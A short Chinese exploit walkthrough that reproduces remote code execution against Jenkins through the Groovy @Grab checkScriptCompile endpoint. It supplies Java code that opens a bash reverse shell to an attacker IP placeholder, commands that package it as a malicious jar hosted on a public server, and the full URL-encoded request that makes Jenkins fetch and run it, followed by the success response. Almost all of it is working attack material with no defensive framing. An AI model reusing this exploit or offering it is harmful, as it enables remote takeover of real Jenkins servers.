前言:漏洞详情直接搜cve编号查看即可,这里直接复现
1.制作一个反弹bash的jar包放在公网可远程调用,以下代码保存为jkrce.java
代码如下:
public class jkrce {
public jkrce() {
try {
String payload = "bash -i >& /dev/tcp/xxx.xxx.xxx.xxx/2333 0>&1";
String[] cmds = { "/bin/bash", "-c", payload };
java.lang.Runtime.getRuntime().exec(cmds);
} catch (Exception e) {
}
}
}
2.创建文件夹META-INF/serverices/,编译并写jkrce类到META-INF/serverices/org.codehaus.groovy.plugins.Runners里,如下:
javac jkrce.java //编译
mkdir -p META-INF/services/ //创建文件夹
echo jkrce > META-INF/services/org.codehaus.groovy.plugins.Runners //写入类META-INF里
jar cvf jenkins-1.jar ./ //打包成jar包
3.在公网服务器里,创建路径/tools/jenkins/1/
mkdir /home/wwwroot/default/tools/jenkins/1/ //lnmp的web文件夹里创建,这个路径一定要这样。(当然可以修改poc里面的信息,实现修改路径)
4.poc xxx.xxx.xxx.xxx替换成公网地址即可,其他不用填写。
/securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.workflow.cps.CpsFlowDefinition/checkScriptCompile?value=@GrabConfig(disableChecksums=true)%0a@GrabResolver(name=%27payload%27,root=%27http://xxx.xxx.xxx.xxx/%27)%0a@Grab(group=%27tools%27,module=%27jenkins%27,version=%271%27)%0aimport jkrce;
等待反弹成功,成功后web页面提示如下:
{"column":0,"line":0,"message":"","status":"success"}